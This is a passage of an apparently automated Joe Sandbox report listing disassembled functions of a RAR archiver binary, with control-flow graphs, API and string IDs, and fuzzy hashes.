                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018544373.00007FF64FE50000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018718674.00007FF64FEC0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018799123.00007FF64FED8000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018849155.00007FF64FED9000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018892086.00007FF64FEDA000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018892086.00007FF64FEE4000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018892086.00007FF64FEEE000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018892086.00007FF64FEF6000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2019066736.00007FF64FEF8000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2019108961.00007FF64FEFE000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_83_2_7ff64fe50000_rar.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: FileModuleNamesnprintfwcschr
                                                                                                                                                                                                                                              • String ID: ,$$%s:$*messages***$*messages***$@%s:$DIALOG$DIRECTION$MENU$RTL$STRINGS$\
                                                                                                                                                                                                                                              • API String ID: 602362809-1645646101
                                                                                                                                                                                                                                              • Opcode ID: ae8474dee3b463159ef0040d2370611761e4d5b9e5e790769e2fb30427c5b3fa
                                                                                                                                                                                                                                              • Instruction ID: 087dc093614d45651639b7236ba59b0466f37fafac88372b4676f3ed134cf50b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ae8474dee3b463159ef0040d2370611761e4d5b9e5e790769e2fb30427c5b3fa
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4B22BE62A1D682E5EB20FB15D454AFA23A1FFC4785F808136EA4EC76D9EF2CE544C350
                                                                                                                                                                                                                                              Function 00007FF64FE64FD0 Relevance: 14.3, APIs: 2, Strings: 6, Instructions: 293COMMON
                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 1405 7ff64fe64fd0-7ff64fe6502d call 7ff64feaa5a0 1408 7ff64fe6504d-7ff64fe65055 1405->1408 1409 7ff64fe6502f-7ff64fe65037 1405->1409 1411 7ff64fe65057-7ff64fe65069 call 7ff64fe6481c 1408->1411 1412 7ff64fe6506e-7ff64fe65089 call 7ff64fe8420c 1408->1412 1409->1408 1410 7ff64fe65039-7ff64fe6504b call 7ff64feac8a0 1409->1410 1410->1408 1410->1411 1411->1412 1418 7ff64fe6508b-7ff64fe6509d call 7ff64fe9a9c0 1412->1418 1419 7ff64fe6509f-7ff64fe650b6 call 7ff64fe9db08 1412->1419 1424 7ff64fe6511b-7ff64fe65131 call 7ff64feac8a0 1418->1424 1419->1424 1425 7ff64fe650b8-7ff64fe650c3 call 7ff64fe9a59c 1419->1425 1430 7ff64fe65137-7ff64fe6513e 1424->1430 1431 7ff64fe65203-7ff64fe6520d call 7ff64fe9aa48 1424->1431 1425->1424 1432 7ff64fe650c5-7ff64fe650cf call 7ff64fe73054 1425->1432 1433 7ff64fe6516c-7ff64fe651be call 7ff64fe9aa1c call 7ff64fe9aa48 call 7ff64fe96e98 1430->1433 1434 7ff64fe65140-7ff64fe65167 call 7ff64fe83f98 1430->1434 1440 7ff64fe65212-7ff64fe6521c 1431->1440 1432->1424 1441 7ff64fe650d1-7ff64fe65107 call 7ff64fe9a9e8 call 7ff64fe9a9c0 call 7ff64fe73054 1432->1441 1497 7ff64fe651d3-7ff64fe651e8 call 7ff64fe97a24 1433->1497 1434->1433 1443 7ff64fe652db-7ff64fe652e0 1440->1443 1444 7ff64fe65222 1440->1444 1441->1424 1521 7ff64fe65109-7ff64fe65116 call 7ff64fe9a9e8 1441->1521 1445 7ff64fe652e6-7ff64fe652e9 1443->1445 1446 7ff64fe65453-7ff64fe65477 call 7ff64fe6f00c call 7ff64fe6f230 call 7ff64fe6f09c 1443->1446 1449 7ff64fe65228-7ff64fe6522d 1444->1449 1450 7ff64fe6532f-7ff64fe65332 1444->1450 1454 7ff64fe65379-7ff64fe65382 1445->1454 1455 7ff64fe652ef-7ff64fe652f2 1445->1455 1499 7ff64fe6547c-7ff64fe65483 1446->1499 1449->1450 1458 7ff64fe65233-7ff64fe65236 1449->1458 1452 7ff64fe6533b-7ff64fe6533e 1450->1452 1453 7ff64fe65334 1450->1453 1462 7ff64fe65347-7ff64fe65358 call 7ff64fe51230 call 7ff64fe54858 1452->1462 1463 7ff64fe65340 1452->1463 1453->1452 1460 7ff64fe65449-7ff64fe65451 call 7ff64fe8eab8 1454->1460 1461 7ff64fe65388-7ff64fe6538b 1454->1461 1464 7ff64fe6536c-7ff64fe65374 call 7ff64fe981cc 1455->1464 1465 7ff64fe652f4-7ff64fe652f7 1455->1465 1468 7ff64fe65238-7ff64fe6523b 1458->1468 1469 7ff64fe65290-7ff64fe65299 1458->1469 1460->1499 1472 7ff64fe6541b-7ff64fe65433 call 7ff64fe9ab1c 1461->1472 1473 7ff64fe65391-7ff64fe65397 1461->1473 1529 7ff64fe6535d 1462->1529 1463->1462 1464->1499 1465->1446 1475 7ff64fe652fd-7ff64fe65300 1465->1475 1480 7ff64fe6523d-7ff64fe65240 1468->1480 1481 7ff64fe65274-7ff64fe6528b call 7ff64fe51230 call 7ff64fe548ec 1468->1481 1477 7ff64fe6529b-7ff64fe6529e 1469->1477 1478 7ff64fe652b2-7ff64fe652bd 1469->1478 1472->1499 1528 7ff64fe65435-7ff64fe65447 call 7ff64fe8bbd4 1472->1528 1488 7ff64fe6540c-7ff64fe65419 call 7ff64fe854f8 call 7ff64fe851e4 1473->1488 1489 7ff64fe65399-7ff64fe6539c 1473->1489 1475->1450 1490 7ff64fe65302-7ff64fe65305 1475->1490 1484 7ff64fe652ce-7ff64fe652d6 call 7ff64fe855e0 1477->1484 1496 7ff64fe652a0-7ff64fe652a6 1477->1496 1483 7ff64fe652bf-7ff64fe652c9 call 7ff64fe9a9e8 1478->1483 1478->1484 1480->1446 1492 7ff64fe65246-7ff64fe65249 1480->1492 1545 7ff64fe6535e-7ff64fe65362 call 7ff64fe514fc 1481->1545 1483->1484 1484->1499 1488->1499 1502 7ff64fe653ef-7ff64fe65401 call 7ff64fe645c8 1489->1502 1503 7ff64fe6539e-7ff64fe653a1 1489->1503 1504 7ff64fe65307-7ff64fe6530a 1490->1504 1505 7ff64fe65322-7ff64fe6532a call 7ff64fe767e0 1490->1505 1492->1450 1507 7ff64fe6524f-7ff64fe65252 1492->1507 1512 7ff64fe652a8-7ff64fe652ad call 7ff64fe67214 1496->1512 1513 7ff64fe65313-7ff64fe6531d call 7ff64fe6481c 1496->1513 1531 7ff64fe651ea-7ff64fe65201 call 7ff64fe96f68 call 7ff64fe514c0 1497->1531 1532 7ff64fe651c0-7ff64fe651ce call 7ff64fe9aa48 1497->1532 1518 7ff64fe65485-7ff64fe6548c call 7ff64fe68444 1499->1518 1519 7ff64fe65491-7ff64fe654bc call 7ff64feaa610 1499->1519 1502->1488 1503->1513 1517 7ff64fe653a7-7ff64fe653d5 call 7ff64fe645c8 call 7ff64fe9ab1c 1503->1517 1504->1446 1520 7ff64fe65310 1504->1520 1505->1499 1507->1446 1524 7ff64fe65258-7ff64fe6525b 1507->1524 1512->1499 1513->1499 1517->1499 1561 7ff64fe653db-7ff64fe653ea call 7ff64fe8ba9c 1517->1561 1518->1519 1520->1513 1521->1424 1539 7ff64fe6526b-7ff64fe65272 1524->1539 1540 7ff64fe6525d-7ff64fe65260 1524->1540 1528->1499 1529->1545 1531->1440 1532->1497 1539->1484 1540->1505 1550 7ff64fe65266 1540->1550 1557 7ff64fe65367 1545->1557 1550->1520 1557->1499 1561->1499
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000053.00000002.2018601741.00007FF64FE51000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF64FE50000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018544373.00007FF64FE50000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018718674.00007FF64FEC0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018799123.00007FF64FED8000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018849155.00007FF64FED9000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018892086.00007FF64FEDA000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018892086.00007FF64FEE4000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018892086.00007FF64FEEE000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018892086.00007FF64FEF6000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2019066736.00007FF64FEF8000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2019108961.00007FF64FEFE000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_83_2_7ff64fe50000_rar.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: wcschr
                                                                                                                                                                                                                                              • String ID: .part$.rar$.rar$AFUMD$FUADPXETK$stdin
                                                                                                                                                                                                                                              • API String ID: 1497570035-1281034975
                                                                                                                                                                                                                                              • Opcode ID: 43ddd1800645f40e7e0ad877604b3aadd6ee3f0a81332a219ef4bf9da79026d2
                                                                                                                                                                                                                                              • Instruction ID: 058afe0850c41108d8beb08c3fbbb53ab0baf1114d46bd2fdf51c63210882d69
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 43ddd1800645f40e7e0ad877604b3aadd6ee3f0a81332a219ef4bf9da79026d2
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4AC19561B1C686A4FA64BF25C8551FC1391BFD1B86F846135FB4ECB6DADE2CE5008311
                                                                                                                                                                                                                                              Function 00007FF64FE97F24 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 100libraryloaderCOMMON
                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 1564 7ff64fe97f24-7ff64fe97f5c 1565 7ff64fe97f5e-7ff64fe97f64 1564->1565 1566 7ff64fe97fd0 1564->1566 1565->1566 1567 7ff64fe97f66-7ff64fe97f7c call 7ff64fe9b3f0 1565->1567 1568 7ff64fe97fd7-7ff64fe97fea 1566->1568 1576 7ff64fe97f7e-7ff64fe97fb3 GetProcAddressForCaller GetProcAddress 1567->1576 1577 7ff64fe97fb5 1567->1577 1570 7ff64fe98036-7ff64fe98039 1568->1570 1571 7ff64fe97fec-7ff64fe97fef 1568->1571 1573 7ff64fe9803b-7ff64fe9804a 1570->1573 1574 7ff64fe9805c-7ff64fe98065 GetCurrentProcessId 1570->1574 1571->1574 1575 7ff64fe97ff1-7ff64fe98000 1571->1575 1584 7ff64fe9804f-7ff64fe98051 1573->1584 1578 7ff64fe98077-7ff64fe98093 1574->1578 1579 7ff64fe98067 1574->1579 1585 7ff64fe98005-7ff64fe98007 1575->1585 1581 7ff64fe97fbc-7ff64fe97fce 1576->1581 1577->1581 1580 7ff64fe98069-7ff64fe98075 1579->1580 1580->1578 1580->1580 1581->1568 1584->1578 1586 7ff64fe98053-7ff64fe9805a 1584->1586 1585->1578 1587 7ff64fe98009 1585->1587 1588 7ff64fe98010-7ff64fe98034 call 7ff64fe6ca6c call 7ff64fe6cda4 call 7ff64fe6ca40 1586->1588 1587->1588 1588->1578
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000053.00000002.2018601741.00007FF64FE51000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF64FE50000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018544373.00007FF64FE50000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018718674.00007FF64FEC0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018799123.00007FF64FED8000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018849155.00007FF64FED9000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018892086.00007FF64FEDA000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018892086.00007FF64FEE4000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018892086.00007FF64FEEE000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018892086.00007FF64FEF6000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2019066736.00007FF64FEF8000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2019108961.00007FF64FEFE000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_83_2_7ff64fe50000_rar.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AddressProc$CallerCurrentDirectoryProcessSystem
                                                                                                                                                                                                                                              • String ID: Crypt32.dll$CryptProtectMemory$CryptProtectMemory failed$CryptUnprotectMemory$CryptUnprotectMemory failed
                                                                                                                                                                                                                                              • API String ID: 1389829785-2207617598
                                                                                                                                                                                                                                              • Opcode ID: 55f9cc654a4765269b34be058e69e02607cbee85ebbaa2d255acd8e9286e0d92
                                                                                                                                                                                                                                              • Instruction ID: 5ff17579f6f4625e7be5a14b323babceaa2d1bc7fd3ffcbf9054e091c6d0d9cf
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 55f9cc654a4765269b34be058e69e02607cbee85ebbaa2d255acd8e9286e0d92
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7D417C21A0CB86B1FA44FB16B8009796BA2BFC4BD6F481135DD5E877A4DE7DE0468320
                                                                                                                                                                                                                                              Function 00007FF64FEAB0FC Relevance: 13.6, APIs: 9, Instructions: 92COMMON
                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000053.00000002.2018601741.00007FF64FE51000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF64FE50000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018544373.00007FF64FE50000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018718674.00007FF64FEC0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018799123.00007FF64FED8000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018849155.00007FF64FED9000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018892086.00007FF64FEDA000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018892086.00007FF64FEE4000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018892086.00007FF64FEEE000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018892086.00007FF64FEF6000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2019066736.00007FF64FEF8000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2019108961.00007FF64FEFE000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_83_2_7ff64fe50000_rar.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ExceptionFilterPresentUnhandled__scrt_fastfail__scrt_is_nonwritable_in_current_image$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual__isa_available_init__scrt_acquire_startup_lock__scrt_initialize_crt__scrt_is_managed_app__scrt_release_startup_lock__scrt_uninitialize_crt__vcrt_initialize
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 552178382-0
                                                                                                                                                                                                                                              • Opcode ID: 9c665b31eb0b804363cbc587f94f2e5aa54598bfa8fc207139a92aecf1914098
                                                                                                                                                                                                                                              • Instruction ID: dabb7f9d29ff028aeb105e05f75f37b6422b4c804011dda24342c0c00835b5c6
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9c665b31eb0b804363cbc587f94f2e5aa54598bfa8fc207139a92aecf1914098
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EF318C21E0C283A2FA15BB24E4263B923E1BFD578AF440436EA4DCB2D7DE2CE404C751
                                                                                                                                                                                                                                              Function 00007FF64FE71E80 Relevance: 7.6, APIs: 5, Instructions: 127filetimeCOMMON
                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 1894 7ff64fe71e80-7ff64fe71ebb call 7ff64feaa5a0 1897 7ff64fe71ebd-7ff64fe71ec1 1894->1897 1898 7ff64fe71ec8 1894->1898 1897->1898 1900 7ff64fe71ec3-7ff64fe71ec6 1897->1900 1899 7ff64fe71ecb-7ff64fe71f57 CreateFileW 1898->1899 1901 7ff64fe71fcd-7ff64fe71fd1 1899->1901 1902 7ff64fe71f59-7ff64fe71f76 GetLastError call 7ff64fe84534 1899->1902 1900->1899 1904 7ff64fe71ff7-7ff64fe7200f 1901->1904 1905 7ff64fe71fd3-7ff64fe71fd7 1901->1905 1911 7ff64fe71fba 1902->1911 1912 7ff64fe71f78-7ff64fe71fb6 CreateFileW GetLastError 1902->1912 1908 7ff64fe72027-7ff64fe7204b call 7ff64feaa610 1904->1908 1909 7ff64fe72011-7ff64fe72022 call 7ff64fe9a9e8 1904->1909 1905->1904 1907 7ff64fe71fd9-7ff64fe71ff1 SetFileTime 1905->1907 1907->1904 1909->1908 1916 7ff64fe71fbf-7ff64fe71fc1 1911->1916 1912->1901 1915 7ff64fe71fb8 1912->1915 1915->1916 1916->1901 1917 7ff64fe71fc3 1916->1917 1917->1901
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000053.00000002.2018601741.00007FF64FE51000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF64FE50000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018544373.00007FF64FE50000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018718674.00007FF64FEC0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018799123.00007FF64FED8000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018849155.00007FF64FED9000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018892086.00007FF64FEDA000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018892086.00007FF64FEE4000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018892086.00007FF64FEEE000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018892086.00007FF64FEF6000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2019066736.00007FF64FEF8000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2019108961.00007FF64FEFE000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_83_2_7ff64fe50000_rar.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: File$CreateErrorLast$Time
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1999340476-0
                                                                                                                                                                                                                                              • Opcode ID: 892e3554a84f7d5f3af4d66201b4842f90aabb2a874f58c4d931fe245cb08f10
                                                                                                                                                                                                                                              • Instruction ID: edf625500f459bbeda415dd68077b9bcc1623caa95299d37a74ce0330f338cf7
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 892e3554a84f7d5f3af4d66201b4842f90aabb2a874f58c4d931fe245cb08f10
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B2412272A1C28156EB64BF24E8057A96BE0BB85BB9F000334EE79836C5DF7DD4458B00
                                                                                                                                                                                                                                              Function 00007FF64FE66AD0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 113COMMON
                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000053.00000002.2018601741.00007FF64FE51000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF64FE50000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018544373.00007FF64FE50000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018718674.00007FF64FEC0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018799123.00007FF64FED8000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018849155.00007FF64FED9000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018892086.00007FF64FEDA000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018892086.00007FF64FEE4000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018892086.00007FF64FEEE000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018892086.00007FF64FEF6000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2019066736.00007FF64FEF8000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2019108961.00007FF64FEFE000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_83_2_7ff64fe50000_rar.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: swprintf
                                                                                                                                                                                                                                              • String ID: rar.ini$switches=$switches_%ls=
                                                                                                                                                                                                                                              • API String ID: 233258989-2235180025
                                                                                                                                                                                                                                              • Opcode ID: 7d70d85aa57c4b2adeedb5d1110c6c2e0691d0eb838de4c05f034f10faa9e0d3
                                                                                                                                                                                                                                              • Instruction ID: a75675625fcad262c88105911634ec836617e747f16cebe70e8c323edf688622
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7d70d85aa57c4b2adeedb5d1110c6c2e0691d0eb838de4c05f034f10faa9e0d3
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4B418B21A2CA86E1EA14FF21D8505B923A0FFC4BA5F802535EA5D87AD6EF7CE555C300
                                                                                                                                                                                                                                              Function 00007FF64FE87E20 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 102COMMON
                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000053.00000002.2018601741.00007FF64FE51000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF64FE50000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018544373.00007FF64FE50000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018718674.00007FF64FEC0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018799123.00007FF64FED8000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018849155.00007FF64FED9000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018892086.00007FF64FEDA000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018892086.00007FF64FEE4000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018892086.00007FF64FEEE000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2018892086.00007FF64FEF6000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2019066736.00007FF64FEF8000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000053.00000002.2019108961.00007FF64FEFE000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_83_2_7ff64fe50000_rar.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AddressHandleModuleProcsetbuf$ErrorLibraryLoadModeVersion
                                                                                                                                                                                                                                              • String ID: rar.lng
                                                                                                                                                                                                                                              • API String ID: 553376247-2410228151
                                                                                                                                                                                                                                              • Opcode ID: 39970e7c6d0227ca57f33f9c031fdb4e3bcfaef39f08ad794915361c5ea6dedb
                                                                                                                                                                                                                                              • Instruction ID: 1f1d05f2ee5245fcb12dfbc98bbcc781afe38198ec1b851e3ec212b0eabd1911
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 39970e7c6d0227ca57f33f9c031fdb4e3bcfaef39f08ad794915361c5ea6dedb
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7D419321E0C287A5FB14BB22A8152B96391BFC1B56F981139FA0EC73D7CE2DE4058751
                                                                                                                                                                                                                                              Function 00007FF64FE840A4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • SHGetMalloc.SHELL32(?,00000800,?,00007FF64FE84432,?,?,?,?,00000800,00000000,00000000,00007FF64FE838CB,?,?,?,00007FF64FE841EC), ref: 00007FF64FE840C4
                                                                                                                                                                                                                                              • SHGetSpecialFolderLocation.SHELL32(?,?,?,?,00000800,00000000,00000000,00007FF64FE838CB,?,?,?,00007FF64FE841EC), ref: 00007FF64FE840DF
                                                                                                                                                                                                                                              • SHGetPathFromIDListW.SHELL32 ref: 00007FF64FE840F1
